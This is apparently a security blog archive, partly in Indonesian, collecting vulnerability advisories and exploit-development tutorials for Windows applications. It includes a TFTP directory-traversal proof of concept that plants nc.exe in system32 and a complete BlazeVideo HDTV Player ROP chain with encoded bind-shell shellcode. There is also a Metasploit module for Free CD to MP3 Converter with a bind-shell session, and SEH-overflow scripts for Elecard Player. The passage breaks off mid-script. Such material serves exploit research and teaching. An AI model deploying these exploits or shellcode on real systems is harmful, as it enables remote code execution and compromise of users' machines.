Distinct TFTP Server <=3.10 Directory Traversal Vulnerability

Overview

Distinct TFTP Server is part of Distinct Intranet Servers made by Distinct. Corp. Distinct TFTP Server version 3.10 is susceptible to directory traversal attack. Attacker can exploit this vulnerability to retrieve or upload files outside of the TFTP server root directory.

Software Description

From Distinct website:

Distinct Intranet Servers, which includes FTP Server, TFTP, LPD, BOOTP and NFS, bring quality server power to your network with no additional hardware investment. These servers allow you to make use of your PCs to share important services among your users.

Vulnerability Details and Attack Vector

The vulnerability is caused due to improper validation to GET and PUT Request containing dot dot slash (‘../’) sequences, which allows attackers to read or write arbitrary files.

By requesting a dot dot slash within the GET or PUT request, it is possible to retrieve operating system file such as boot.ini or upload file (errh, nc.exe?) to Windows %systemroot% (C:\WINDOWS\system32).

Impact

A remote attacker may be able to leverage this vulnerability to gain access and has write access to system and other configuration files resulting in loss of confidentiality and integrity.

Proof of Concept

We assume that the directory is deep enough, so you have to set a deep path on the server configuration. If a GET request followed with ‘../../’ (dot dot slash), trying to retrieve boot.ini file, is sent to Distinct TFTP Server 3.10, the file will be retrieved successfully.

hell:~ modpr0be$ tftp -e 10.211.55.5 69
tftp&gt; get ../../../../../../../../../../../../../boot.ini
Received 211 bytes in 0.0 seconds
tftp&gt;

Next, if we try to upload a file, let say Netcat (nc.exe), to Windows %systemroot% directory (C:\WINDOWS\system32) using a PUT command, here is the result:

hell:~ modpr0be$ tftp -e 10.211.55.5 69
tftp&gt; put /Pentest/backdoor/nc.exe ../../../../../../../../../../../../../../../Windows/system32/nc.exe
Sent 59392 bytes in 0.3 seconds
tftp&gt;

Netcat successfully uploaded.

Another combinations:

tftp&gt; get ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
tftp&gt; put /Pentest/backdoor/nc.exe ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\system32\nc.exe

Solution Status

Update to the latest version here

Risk Factor

CVSS Base Score = 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N)
Exploitability Subscore = 10
Impact Subscore = 4.9
CVSS Temporal Score = 5.2
Overall CVSS Score = 5.8
Risk factor = Medium

References

Exploit-DB advisory: https://www.exploit-db.com/exploits/18718/

Disclosure Timeline

March 28, 2012, issue discovered
March 28, 2012, vendor contacted about the issue, no response
April 9, 2012, public advisory released

Directory Traversal with DotDotPwn (HTTPS Mode)

This is my experience when I was dealing with some applications which have a Directory Traversal vulnerability. I was using DotDotPwn by nitr0us when finding vulnerability on Quickshare File Server 1.2.1 (on the FTP protocol). I also used DotDotPwn when I was doing a pentest on my client. So, let the experience tell you the story.

Quickshare File Server 1.2.1

First, I download the software here, setup the XP lab machine, download DotDotPwn here, and all preparation should be ready. We must setup the Quickshare File Server to point to our FTP directory, let the user set to “Allow anonymous user”.

More

Aviosoft DTV Player 1.x Stack Buffer Overflow

Aviosoft DTV Player is a multiple format video player application. Aviosoft DTV Player 1.0.1.2 and possibly earlier versions fail to properly handle malformed user-supplied data within a playlist (.plf) file before copying it into an insufficiently sized buffer, resulting in a buffer overflow.

Software Description

Aviosoft DTV Player is a multi-media center combines TV/video/DVD playback, video recording, media converting, FM radios connecting in one intelligent program. Aviosoft DTV Player allows users to watch free-to-air TV shows and analog TV shows. Fully supports TV card with BDA interface, stably run with DVB-T, DVB-S, DVB-S2, ATSC, ISDB-T, ISDB-S, CMMB, DMB-T/H TV-tuner.

Vulnerability Details

The main program AviosoftDTV.exe is prone to a remote memory-corruption vulnerability because the application fails to handle malformed playlist files (.plf). When the program try to load specially-crafted .plf file, it fails to perform boundary checking of the user input file, thus overwriting the Structured Exception Handling chain. This can be bypassed by overwrite the SE Handler address and pass the execution to EIP. Since we can control EIP, arbitrary code can be introduced and lead us to code execution.

Attacker can use this vulnerability to exploit user without prior knowledge via SMB or WebDAV share, instead of bring the specially-crafted file directly.

Below is the dump result when the exception occured:

First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00001237 ebx=03530318 ecx=000000a3 edx=03537a2c esi=035389d4 edi=00130000
eip=6400f6f0 esp=0012f038 ebp=00000001 iopl=0         nv up ei pl nz ac pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010217
*** WARNING: Unable to verify checksum for C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\MediaPlayerCtrl.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\MediaPlayerCtrl.dll -
MediaPlayerCtrl!DllCreateObject+0x220:
6400f6f0 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000&gt; d fs:[0]
003b:00000000  bc f3 12 00 00 00 13 00-00 f0 11 00 00 00 00 00 ................
003b:00000010  00 1e 00 00 00 00 00 00-00 f0 fd 7f 00 00 00 00 ................
003b:00000020  4c 05 00 00 50 05 00 00-00 00 00 00 00 00 00 00 L...P...........
003b:00000030  00 a0 fd 7f 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000040  c0 02 d8 e1 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000050  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000060  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
003b:00000070  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
0:000&gt; d 0012f3bc
0012f3bc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f3cc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f3dc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f3ec  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f3fc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f40c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f41c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f42c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0:000&gt; g
(54c.550): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000
eip=41414141 esp=0012ec68 ebp=0012ec88 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
+0x41414100:
41414141 ??              ???

Proof of Concept

Here is the proof of concept:

#!/usr/bin/python
filename = 'test.plf'
junk = "A" * 4000
f = open(filename,'w')
f.write(junk)
print "Malformed",filename,"created successfully."
f.close()

Solution

Unpatched

Discovered by

Tom Gregory from Spentera Research.

Reference

http://www.kb.cert.org/vuls/id/998403

Working Exploit

https://github.com/modpr0be/exploit-dev/blob/master/exploit-repo/aviosoft-dtv/adtv-rop-dep-aslr-bypass.py

BlazeVideo HDTV Player 6.x Buffer Overflow (another version)

Hi again, we tried to make a universal DEP and ASLR bypass version on BlazeVideo HDTV Player 6.x. This exploit is already public, but we just want to make it universal.

Take a look at mona.py 🙂 awesome tool developed by corelanc0d3r and his team
So here is the poc, it will bind to port 31337

#!/usr/bin/python

import struct
file = 'blazevideo-universal.plf'

totalsize = 5000
junk = 'A' * 872
align = 'B' * 136

#we don't need nseh
seh = '\x4a\x53\x30\x61'	# ADD ESP,800 # RETN
rop = '\x03\x60\x32\x61' * 10	# RETN (ROP NOP)
rop+= '\x7a\x34\x05\x64' 	# POP EDX # RETN
rop+= '\x08\x11\x01\x10'	# ptr to VirtualProtect()
rop+= '\x03\x05\x01\x64'	# PUSH EDX # POP EAX # POP ESI # RETN
rop+= '\x41\x41\x41\x41'	# Filler
rop+= '\x9f\x94\x60\x61'	# MOV ECX,DWORD PTR DS:[EDX] # POP SOMETHING
rop+= '\x41\x41\x41\x41' * 3	# Filler
rop+= '\x18\x42\x60\x61'	# PUSH ECX # ADD AL,5F # XOR EAX,EAX
rop+= '\x41\x41\x41\x41' * 3	# Filler
rop+= '\xa6\xd1\x03\x64'	# POP EBP # RETN
rop+= '\x41\x41\x41\x41' * 3	# Filler
rop+= '\x5A\x05\x61\x61'	# push esp #  ret 0c
rop+= '\xA8\x3E\x32\x61'	# POP EAX # RETN
rop+= '\x9D\x79\x39\xA1'	# 0x00000501-&gt; ebx
rop+= '\xfc\x03\x02\x64' 	# ADD EAX,5EC68B64 # RETN
rop+= '\x7b\xd3\x63\x61'	# PUSH EAX # ADD AL,5E
rop+= '\x07\x68\x62\x61' 	# XOR EAX,EAX # RETN
rop+= '\xfc\x03\x02\x64' 	# ADD EAX,5EC68B64 # RETN
rop+= '\x7a\x34\x05\x64' 	# POP EDX # RETN
rop+= '\xDC\x74\x39\xA1'	# 0x00000040-&gt; edx
rop+= '\xfb\x07\x31\x61' 	# ADD EDX,EAX # MOV EAX,EDX
rop+= '\xc0\x1f\x60\x61'	# POP ECX # RETN
rop+= '\x40\x03\x35\x60'	# Writable location
rop+= '\x07\x9e\x32\x61'	# POP EDI # RETN
rop+= '\x03\x60\x32\x61'	# RETN (ROP NOP)
rop+= '\x95\x65\x60\x61'	# POP EAX # RETN
rop+= '\x90\x90\x90\x90'	# nop
rop+= '\xF1\x0C\x62\x61'	# PUSHAD # RETN

nop = '\x90' * 32

# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=31337, RHOST=, EXITFUNC=process, 

shellcode = (
"\xdd\xc1\xd9\x74\x24\xf4\xbb\xc4\xaa\x69\x8a\x58\x33\xc9\xb1"
"\x56\x83\xe8\xfc\x31\x58\x14\x03\x58\xd0\x48\x9c\x76\x30\x05"
"\x5f\x87\xc0\x76\xe9\x62\xf1\xa4\x8d\xe7\xa3\x78\xc5\xaa\x4f"
"\xf2\x8b\x5e\xc4\x76\x04\x50\x6d\x3c\x72\x5f\x6e\xf0\xba\x33"
"\xac\x92\x46\x4e\xe0\x74\x76\x81\xf5\x75\xbf\xfc\xf5\x24\x68"
"\x8a\xa7\xd8\x1d\xce\x7b\xd8\xf1\x44\xc3\xa2\x74\x9a\xb7\x18"
"\x76\xcb\x67\x16\x30\xf3\x0c\x70\xe1\x02\xc1\x62\xdd\x4d\x6e"
"\x50\x95\x4f\xa6\xa8\x56\x7e\x86\x67\x69\x4e\x0b\x79\xad\x69"
"\xf3\x0c\xc5\x89\x8e\x16\x1e\xf3\x54\x92\x83\x53\x1f\x04\x60"
"\x65\xcc\xd3\xe3\x69\xb9\x90\xac\x6d\x3c\x74\xc7\x8a\xb5\x7b"
"\x08\x1b\x8d\x5f\x8c\x47\x56\xc1\x95\x2d\x39\xfe\xc6\x8a\xe6"
"\x5a\x8c\x39\xf3\xdd\xcf\x55\x30\xd0\xef\xa5\x5e\x63\x83\x97"
"\xc1\xdf\x0b\x94\x8a\xf9\xcc\xdb\xa1\xbe\x43\x22\x49\xbf\x4a"
"\xe1\x1d\xef\xe4\xc0\x1d\x64\xf5\xed\xc8\x2b\xa5\x41\xa2\x8b"
"\x15\x22\x12\x64\x7c\xad\x4d\x94\x7f\x67\xf8\x92\xb1\x53\xa9"
"\x74\xb0\x63\x37\xec\x3d\x85\xad\xfe\x6b\x1d\x59\x3d\x48\x96"
"\xfe\x3e\xba\x8a\x57\xa9\xf2\xc4\x6f\xd6\x02\xc3\xdc\x7b\xaa"
"\x84\x96\x97\x6f\xb4\xa9\xbd\xc7\xbf\x92\x56\x9d\xd1\x51\xc6"
"\xa2\xfb\x01\x6b\x30\x60\xd1\xe2\x29\x3f\x86\xa3\x9c\x36\x42"
"\x5e\x86\xe0\x70\xa3\x5e\xca\x30\x78\xa3\xd5\xb9\x0d\x9f\xf1"
"\xa9\xcb\x20\xbe\x9d\x83\x76\x68\x4b\x62\x21\xda\x25\x3c\x9e"
"\xb4\xa1\xb9\xec\x06\xb7\xc5\x38\xf1\x57\x77\x95\x44\x68\xb8"
"\x71\x41\x11\xa4\xe1\xae\xc8\x6c\x11\xe5\x50\xc4\xba\xa0\x01"
"\x54\xa7\x52\xfc\x9b\xde\xd0\xf4\x63\x25\xc8\x7d\x61\x61\x4e"
"\x6e\x1b\xfa\x3b\x90\x88\xfb\x69")

sisa = 'C' * (totalsize - len(seh+rop+nop+shellcode))
payload = junk+seh+align+rop+nop+shellcode+sisa

f = open(file,'w')
print "Author: modpr0be"
f.write(payload)
print "File",file, "successfully created"
f.close()

here is the result, tested on Windows 7 SP1:

Porting Your Exploit to Metasploit

Beberapa waktu yang lalu saya udah memberikan tutorial basic exploit development (direct return technique) dan exploit development berbasis SEH. Sekarang mari kita porting exploit tersebut ke Metasploit Framework agar exploit tersebut semakin reliable dan bisa menggunakan macam-macam payload, fitur-fitur canggih yang ada di Metasploit.

Kita akan meng-konversi exploit yang pertama, yaitu Free CD to MP3 Converter. Sebelum itu, kita kumpulkan poin-poin penting yang membuat exploit tersebut berjalan dengan baik, seperti berikut:

junk = "\x41" * 4112                   # jumlah sampah yang dikirim
eip = "\x91\x3b\x43\x00"               # 0x00463b91 FFE4 JMP ESP at cdextract.exe
nops = "\x90" * 16
espdata = "\x90" * (5000 - len(junk+eip+nops)

Dulu saya melakukan proses exploit Free CD to MP3 Converter pada sistem Windows XP SP3 versi NIST FDCC (Federal Desktop Core Configuration), tapi kali ini saya melakukannya pada sistem Windows XP SP3 versi umum, seharusnya ini tidak akan menjadi masalah berarti karena alamat JMP ESP yang saya gunakan kali ini berasal dari module cdextract.exe.

Kita akan coba langsung meng-konversi exploit Free CD to MP3 Converter ke format Metasploit, dan akan saya jelaskan bagian-bagian yang penting. Karena proses eksploitasi Free CD to MP3 Converter menggunakan sebuah file wav (sehingga dikategorikan sebagai file format exploit), maka kita akan menggunakan salah satu exploit dari Metasploit sebagai template, yaitu a-pdf_wav_to_mp3.rb terdapat pada direktori /opt/framework/msf3/modules/exploits/windows/fileformat/

##
# $Id: a-pdf_wav_to_mp3.rb 12196 2011-04-01 00:51:33Z egypt $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3  'A-PDF WAV to MP3 v1.0.0 Buffer Overflow',
      'Description'    =&gt; %q{
          This module exploits a buffer overflow in A-PDF WAV to MP3 v1.0.0. When
        the application is used to import a specially crafted m3u file, a buffer overflow occurs
        allowing arbitrary code execution.
      },
      'License'        =&gt; MSF_LICENSE,
      'Author'         =&gt;
        [
          'd4rk-h4ck3r', # Original Exploit
          'Dr_IDE',      # SEH Exploit
          'dookie'       # MSF Module
        ],
      'Version'        =&gt; '$Revision: 12196 $',
      'References'     =&gt;
        [
          [ 'OSVDB', '67241' ],
          [ 'URL', 'http://www.exploit-db.com/exploits/14676/' ],
          [ 'URL', 'http://www.exploit-db.com/exploits/14681/' ]
        ],
      'DefaultOptions' =&gt;
        {
          'EXITFUNC' =&gt; 'seh',
          'DisablePayloadHandler' =&gt; 'true',
        },
      'Payload'        =&gt;
        {
          'Space'    =&gt; 600,
          'BadChars' =&gt; "\x00\x0a",
          'StackAdjustment' =&gt; -3500
        },
       'Platform' =&gt; 'win',
       'Targets'        =&gt;
            [
              [ 'Windows Universal', { 'Ret' =&gt; 0x0047265c, 'Offset' =&gt; 4132 } ],     # p/p/r in wavtomp3.exe
            ],
       'Privileged'     =&gt; false,
       'DisclosureDate' =&gt; 'Aug 17 2010',
       'DefaultTarget'  =&gt; 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.wav']),
      ], self.class)

  end

  def exploit

    sploit = rand_text_alpha_upper(target['Offset'])
    sploit &lt;&lt; generate_seh_payload(target.ret)

    print_status(&quot;Creating &#039;#{datastore[&#039;FILENAME&#039;]}&#039; file ...&quot;)

    file_create(sploit)

  end

end

Bagian yang perlu diperhatikan adalah:

  • include Msf::Exploit::FILEFORMAT

    bagian ini menandakan bahwa exploit ini termasuk dalam fileformat exploit.

  • Payload

    bagian ini berisi space, badchars, dll

  • Targets

    bagian ini berisi offset

  • def exploit

    bagian ini berisi urutan eksploitasi.

Mari kita gabungkan informasi yang kita miliki diawal kedalam contoh exploit yang sudah ada.

##

##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3  'Free CD to MP3 Converter 3.1 Buffer Overflow',
      'Description'    =&gt; %q{
          This module exploits a buffer overflow in Free CD to MP3 Converter 3.1. When
        the application is used to import a specially crafted m3u file, a buffer overflow occurs
        allowing arbitrary code execution.
      },
      'License'        =&gt; MSF_LICENSE,
      'Author'         =&gt;
        [
          'C4SS!0 G0M3S', # Original Exploit
          'modpr0be'       # MSF Module
        ],
      'References'     =&gt;
        [
          [ 'OSVDB', '69116' ],
          [ 'URL', 'http://www.exploit-db.com/exploits/15480/' ],
        ],
      'DefaultOptions' =&gt;
        {
          'EXITFUNC' =&gt; 'process',
          'DisablePayloadHandler' =&gt; 'true',
        },
      'Payload'        =&gt;
        {
          'Space'    =&gt; 800,
          'BadChars' =&gt; "\x00\x0a\x1a\x0f",
          'StackAdjustment' =&gt; -3500
        },
       'Platform' =&gt; 'win',
       'Targets'        =&gt;
            [
              [ 'Windows XP Universal', {
                    'Ret' =&gt; 0x00463B91,     # perintah JMP ESP yang akan menimpa EIP.
                    'Offset' =&gt; 4112 } ],    # jmp esp in cdextract.exe, jumlah offset yang dicapai untuk menimpa EIP
            ],
       'Privileged'     =&gt; false,
       'DisclosureDate' =&gt; 'Nov 10 2010',
       'DefaultTarget'  =&gt; 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.wav']),
      ], self.class)

  end

  def exploit

    sploit = rand_text_alpha(target['Offset'])
    sploit &lt;&lt; [target.ret].pack(&#039;V&#039;)
    sploit &lt;&lt; make_nops(32)
    sploit &lt;&lt; payload.encoded
    sploit &lt; 0x00463B91

adalah perintah JMP ESP yang akan menimpa EIP.

Offset =&gt; 4112

adalah jumlah offset yang dicapai untuk menimpa EIP 🙂

Lalu bagian paling penting dari script tersebut, yaitu def exploit;

rand_text_alpha(target['Offset']

bagian ini adalah function dari Metasploit untuk men-generate sejumlah karakter alphanumeric sesuai dengan Offset yang telah kita tentukan di option Target sebelumnya. Setelah offset memenuhi stack dengan jumlah 4112 bytes, maka kita juga sudah tahu bahwa setelah itu EIP akan tertimpa sebanyak 4 bytes, sehingga option berikutnya [target.ret].pack(‘V’) memanggil alamat Ret => 0x00463B91 yang telah kita tentukan sebelumnya dan segera menimpa EIP. Setelah itu

make_nops(32)

akan menciptakan Nopsled sebanyak 32 bytes agar menjadi ‘landasan kosong’ sebelum mencapai shellcode. Bagian berikutnya,

payload.encoded

adalah function dari Metasploit untuk men-generate payload yang biasa kita gunakan pada Metasploit (misal: set payload windows/shell_bind_tcp). Terakhir, saya menambahkan Nopsled untuk melengkapi buffer yang saya kirim sebelumnya agar mencapai 5000 bytes (sesuai dengan buffer yang saya kirim sebelumnya). Lalu function

file_create(sploit)

menulis variable sploit dan menciptakan file msf.wav.

Simpan file diatas dengan nama freecdmp3_bof.rb dan copy ke folder /opt/framework/msf3/modules/exploits/windows/fileformat/ agar dapat digunakan oleh Metasploit. Berikut penggunaannya pada msfconsole:

       =[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 738 exploits - 376 auxiliary - 82 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
       =[ svn r13774 updated yesterday (2011.09.22)

msf &gt; use exploit/windows/fileformat/freecdmp3_bof
msf  exploit(freecdmp3_wav) &gt; info

       Name: Free CD to MP3 Converter 3.1 Buffer Overflow
     Module: exploit/windows/fileformat/freecdmp3_bof
    Version: 0
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  C4SS!0 G0M3S
  modpr0be

Available targets:
  Id  Name
  --  ----
  0   Windows XP Universal

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILENAME  msf.wav          no        The file name.

Payload information:
  Space: 800
  Avoid: 4 characters

Description:
  This module exploits a buffer overflow in Free CD to MP3 Converter
  3.1. When the application is used to import a specially crafted wav
  file, a buffer overflow occurs allowing arbitrary code execution.

References:
  http://www.osvdb.org/69116
  http://www.exploit-db.com/exploits/15480/

msf  exploit(freecdmp3_bof) &gt; set payload windows/shell_bind_tcp
payload =&gt; windows/shell_bind_tcp
msf  exploit(freecdmp3_bof) &gt; set lport 4321
lport =&gt; 4321
msf  exploit(freecdmp3_bof) &gt; exploit 

[*] Creating 'msf.wav' file ...
[*] Generated output file /home/tom/.msf4/data/exploits/msf.wav
msf  exploit(freecdmp3_bof) &gt;

Dan ketika di load oleh program Free CD to MP3 Converter, sekilas program akan terlihat ‘hang’ tapi jika kita lihat melalui netstat:

Terdapat port 4321 yang sedang LISTENING. Dan ketika kita melakukan koneksi ke port tersebut:

Kita berhasil mengkonversi exploit yang sudah ada ke dalam Metasploit. Sekarang coba porting exploit berbasis SEH yang kemarin sudah kita kerjakan sama-sama. Selamat mencoba!

ScriptFTP <=3.3 Remote Buffer Overflow Exploit (0day)

ScriptFTP client is vulnerable against remote buffer overflow vulnerability. The condition is triggered while processing LIST FTP command with excessive length.

The vulnerability is confirmed in version 3.3. Other version may also be affected.

Software Description

ScriptFTP is a FTP client designed to automate file transfers. It follows the commands written on a text file (also called script file) and makes the uploads or downloads automatically. Writing the script file is very easy, take a look at the script samples section.

Crash/Exploit Information

ScriptFTP follows the commands written on a text file (also called script file). Specifically, processing ScriptFTP with text file/script file contains command GETLIST or GETFILE of 3000 or more bytes of data may trigger an exception within the client, causing it to crash and lead us to stack overflow.

Proof of Concept

See the POC here and the script to generate ScriptFTP script here. Or if you were too lazy to generate the script, I already prepared it for you, just change the IP address.

Fix and Update

Vendor contacted and responded immediately after our first contact. They are planning to major rewrite but until now, no further info received from them. Do not connect to untrusted FTP server. Fix or update is not available yet, we will update this post if the vendor fix the bug.

Vendor Contact Log:
01/21/2011: Bug found
01/22/2011: Vendor contacted
01/24/2011: Vendor replied
03/07/2011: Update status to vendor
04/06/2011: Vendor received POC
05/17/2011: No further info, 1st reminder sent.
09/11/2011: No further info, 2nd reminder sent.
09/20/2011: No response, advisory released.

SEH Based Stack Overflow – The Basic

Kali ini saya akan coba tehnik lain dari stack overflow, yaitu stack overflow berbasis SEH. Apa itu SEH? silakan dibaca diliteratur-literatur berikut:

Structured Exception Handling
Win32 Exception handling for assembler programmers

Tidak ada yang lebih menyenangkan daripada belajar sambil mencoba. Kita akan mencoba SEH based stack overflow pada program yang pernah di post oleh sickness, yaitu Elecard AVC_HD/MPEG Player. Program Elecard AVC_HD/MPEG Player versi 5.7 menderita buffer overflow ketika mencoba load file .m3u yang ditambahkan sejumlah karakter. Percobaan ini akan dilakukan pada sistem Windows XP SP3 dan menggunakan program seperti pada exploit yang di gunakan oleh sickness, jadi silakan download dulu programnya:

Download Elecard AVC_HD/MPEG Player (via ExploitDB)

Saya berasumsi bahwa teman-teman sudah membaca tulisan saya sebelumnya Exploit Development: Basic Stack-based Overflow sehingga sudah tahu apa yang perlu dipersiapkan. Secara teori, SEH based overflow memerlukan trik khusus karena kita berhadapan dengan Exception Handling. Ketika program crash (karena buffer overflow), EIP tidak langsung tertimpa dengan buffer/junk yang kita kirim, tapi mengarahkan kita ke exception handling. Kita hanya perlu memastikan bahwa alamat SE Handler juga tertimpa dengan buffer yang kita kirimkan, sehingga ketika exception handling diteruskan, maka akan membawa kita ke EIP. Kedengarannya sangat rumit, tapi tenang, semuanya akan terlihat lebih mudah apabila mencoba langsung.

Confirm the BUG and Adjust the Enemy Line

Setelah diinstall, jalankan Elecard AVC_HD/MPEG Player dan attach ke Immunity Debugger. Lalu kita buat script yang membuat Elecard AVC_HD/MPEG Player crash.

#!/usr/bin/python

file = 'crash-elecard.m3u'
header = '#EXTM3U'
junk = 'A' * 25000

f = open(file,'w')
print "Payload size: ", len(header+junk)
f.write(header+junk)
print "File",file, "successfully created"
f.close()

Jalankan scriptnya dan buka dengan Elecard AVC_HD/MPEG Player. Perhatikan apa yang terjadi pada debugger.

Terlihat bahwa register EBP dan ESI tertimpa dengan 0x41414141, artinya saat ini buffer kita ada di kedua register tersebut. Tekan Alt-S untuk melihat window SEH Chain dan terlihat SE Handler tertimpa juga dengan 0x41414141.

Selanjutnya kita harus mencari jumlah byte yang tepat untuk menimpa alamat SE Handler (masih ingat tutorial sebelumnya?!). Kita dapat menggunakan program Metasploit untuk melakukan hal tersebut (good exercise right?!).

POP POP RETN, is it for our movie?

Setelah itu kita perlu mencari deretan perintah (sequence of commands) POP [REG]+POP [REG]+RETN dan melanjutkan exception sehingga program akan mengarah pada deretan perintah POP [REG]+POP [REG]+RETN. Mengapa kita perlu deretan perintah tersebut? Kalau saya jelaskan sekarang nanti tambah rumit, lebih baik saya jelaskan sambil mencoba.

Kita bisa mencari alamat POP [REG]+POP [REG]+RETN dengan perintah Ctrl+S dan menuliskan sebagai berikut:

dan menemukan alamat POP EDI + POP EBX + RETN pada alamat 0x7394D3D2 (module D3DIM700.dll) berikut:

Kita update script skeleton exploit yang sudah kita buat:

#!/usr/bin/python

file = 'crash-elecard.m3u'
header = '#EXTM3U'
junk = 'A' * 4 + 'C' * 4 + '\xD2\xD3\x94\x73' + 'D' * 24988

f = open(file,'w')
print "Payload size: ", len(junk)
f.write(header+junk)
print "File",file, "successfully created"
f.close()

Jalankan lagi exploit diatas, (masih ingat kenapa alamat POP POP RET ditulis terbalik?!) jalankan juga program Elecard AV_HD/MPEG Player dan attach ke debugger. Load lagi file .m3u tersebut dan kali ini perhatikan pada SE Handler:

Lakukan Breakpoint dengan menekan F2 pada alamat tersebut, lalu tekan Shift+F9 untuk meneruskan exception. Dapat terlihat bahwa EIP sekarang terisi oleh alamat POP [REG]+ POP [REG] + RETN yang telah kita tentukan, dan aliran eksekusi program sekarang berubah ke alamat POP EDI + POP EBX + RETN (perhatikan bahwa nilai EIP saat ini sama dengan nilai pada alamat POP EDI + POP EBX + RETN)

Perhatikan, register ESP tidak menunjuk pada stack, sementara kita membutuhkan ESP untuk menunjuk ke alamat stack agar kita bisa mengeksekusi shellcode nanti. Lalu apa yang bisa kita perbuat? jika kita perhatikan, pada baris ketiga jendela stack, terdapat alamat yang merujuk pada buffer yang kita kirimkan sebelumnya, yaitu 0x0012C73C, hey! bukankah itu alamat Next SEH (Pointer to Next SEH)?! Lalu bagaimana caranya agar ESP menunjuk ke alamat tersebut?

Disinilah peran POP EDI + POP EBX + RETN. Perintah POP EDI akan mengambil baris pertama pada stack kedalam register EDI, perintah POP EBX juga mengambil alamat pada baris kedua dalam stack ke dalam register EBX , selanjutnya perintah RETN akan kembali menunjuk pada ESP , Voila! Sampailah kita pada alamat buffer yang kita kirimkan sebelumnya.

Pada saat ini, register EIP pun menunjuk ke alamat baru, yaitu 0x0012C73C, perlu diingat bahwa ini adalah alamat Next SEH dan EIP menunjuk perintah selanjutnya yaitu, 0x43434343 pada alamat 0x0012C73C.

Sejauh ini, dapat kita simpulkan sebagai berikut:

Alamat 0x0012C740 adalah alamat SE Handler, sedangkan pada alamat 0x0012C744 (yang berisi karakter ‘D’) merupakan buffer yang bisa kita gunakan untuk mengeksekusi shellcode. Terdapat masalah disini, karena kita harus melewati alamat SE Handler yang berisi perintah RCL BL, CL, XCHG EAX, ESP dan JNB SHORT 0012C789, kenapa perlu dilewati? karena berpotensi merusak proses yang sudah kita kerjakan sejauh ini 🙂

Bagaimana caranya?

JMP SHORT 0xDREAMLAND

Salah satu tehnik yang bisa digunakan adalah short jump, literatur short jump bisa dilihat pada website berikut: Using SHORT (Two-byte) Relative Jump Instructions

Kita akan lompat sejauh 8 bytes dari posisi terakhir 0x0012C73C, sehingga akan mendarat pada alamat 0x0012C746. Kita update lagi script skeleton exploit:

#!/usr/bin/python

file = 'crash-elecard.m3u'
header = '#EXTM3U'
junk = 'A' * 4 + '\xeb\x08\x90\x90' + '\xD2\xD3\x94\x73' + 'D' * 24988

f = open(file,'w')
print "Payload size: ", len(junk)
f.write(header+junk)
print "File",file, "successfully created"
f.close()

Perhatikan bahwa saya menambah alamat ‘\xeb\x08\x90\x90’, yaitu untuk loncat sejauh 8 bytes, sedangkan ‘\x90’ adalah nop untuk melengkapi 2 bytes agar tidak terisi dengan ‘\x00’. Jalankan script tersebut, lalu load lagi file m3u-nya. Lakukan breakpoint pada alamat SE Handler, lalu teruskan exception dengan menekan Shift+F9. Lalu tekan F7 untuk Follow perintah POP EDI, POP EBX, dan RETN. Perhatikan ketika RETN terjadi, alamat EIP merujuk kembali ke alamat 0x0012C73C dan pada alamat tersebut sudah menunggu perintah JMP SHORT yang telah kita tentukan tadi (\xeb\x08\x90\x90), tekan F7 untuk Follow dan perhatikan:

Alamat EIP mendarat tepat pada alamat 0x0012C746 yang berarti kita telah melewati alamat SE Handler. Apabila karakter ‘D’ (\x44) kita ganti dengan shellcode, maka shellcode akan tereksekusi setelahnya.

Finalized the Exploit

Mari kita ganti karakter ‘D’ yang kita gunakan sebagai junk dengan shellcode, saya akan menggunakan shellcode untuk memanggil program Calculator (calc.exe), dan kita rapikan skeleton exploit yang sudah kita buat sejauh ini:

#!/usr/bin/python

file = 'crash-elecard.m3u'
header = '#EXTM3U'

# msfpayload windows/exec cmd=calc R |
